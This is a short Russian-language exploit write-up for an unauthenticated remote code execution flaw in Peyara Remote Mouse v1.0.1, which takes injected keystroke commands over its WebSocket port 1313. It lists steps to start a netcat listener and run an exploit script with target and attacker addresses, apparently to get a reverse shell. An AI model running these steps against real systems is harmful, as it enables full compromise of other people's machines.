
Peyara Remote Mouse v1.0.1 - Удаленное выполнение кода (RCE)
Peyara Remote Mouse v1.0.1 содержит уязвимость удалённого выполнения кода без аутентификации в своём интерфейсе команд WebSocket (порт 1313). Приложение не проверяет и не очищает (санитизирует) команды имитации клавиатурного ввода, получаемые через WebSocket-соединения, что позволяет злоумышленникам выстраивать цепочки вредоносных клавиатурных событий для выполнения произвольных системных команд. Данная уязвимость может быть использована удалённо без аутентификации для полной компрометации системы.
Установите уязвимое приложение
Загрузите и установите Peyara Remote Mouse на целевой системе Windows.
Запустите слушатель Netcat
Откройте терминал и выполните:
nc -nlvp 4444
Выполните скрипт эксплойта
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

